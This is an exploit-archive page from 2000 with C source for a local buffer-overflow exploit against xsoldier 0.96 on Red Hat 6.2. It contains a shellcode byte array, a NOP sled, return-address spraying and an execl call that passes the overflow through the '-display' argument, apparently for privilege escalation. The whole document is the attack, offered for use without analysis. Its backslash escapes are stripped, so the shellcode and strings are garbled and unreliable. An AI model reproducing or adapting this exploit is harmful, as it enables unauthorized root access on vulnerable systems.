[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Linux xsoldier-0.96 exploit (Red Hat 6.2)
# Published : 2000-12-15
# Author : zorgon
# Previous Title : BSD chpass (pw_error(3)) Local Root Exploit
# Next Title : Sendmail 8.11.x Exploit (i386-Linux)
#include <stdio.h>
#include <stdlib.h>
#define NOP 0x90
#define BUFSIZE 4408
#define OFFSET 0
#define RANGE 20
unsigned char blah[] =
"xebx03x5exebx05xe8xf8xffxffxffx83xc6x0dx31xc9xb1x6cx80x36x01x46xe2xfa"
"xeax09x2ex63x68x6fx2ex72x69x01x80xedx66x2ax01x01"
"x54x88xe4x82xedx1dx56x57x52xe9x01x01x01x01x5ax80xc2xc7x11"
"x01x01x8cxbax1fxeexfexfexc6x44xfdx01x01x01x01x88x7cxf9xb9"
"x47x01x01x01x30xf7x30xc8x52x88xf2xccx81x8cx4cxf9xb9x0ax01"
"x01x01x88xffx30xd3x52x88xf2xccx81x30xc1x5ax5fx5ex88xedx5c"
"xc2x91";
long get_sp () { __asm__ ("mov %esp, %eax"); }
int
main (int argc, char *argv[])
{
char buffer[BUFSIZE];
int i, offset;
unsigned long ret;
if (argc > 1)
offset = atoi(argv[1]);
else
offset = OFFSET;
for (i = 0; i < (BUFSIZE - strlen (blah) - RANGE*2); i++)
*(buffer + i) = NOP;
memcpy (buffer + i, blah, strlen (blah));
ret = get_sp();
for (i = i + strlen (blah); i < BUFSIZE; i += 4)
*(long *) &buffer[i] = ret+offset;
fprintf(stderr, "xsoldier-0.96 exploit for Red Hat Linux release 6.2 (Zoot)n");
fprintf(stderr, "zorgon@antionline.orgn");
fprintf(stderr, "[return address = %x] [offset = %d] [buffer size = %d]n", ret + offset, offset, BUFSIZE);
execl ("./xsoldier", "xsoldier", "-display", buffer, 0);
}
// www.Syue.com [2000-12-15]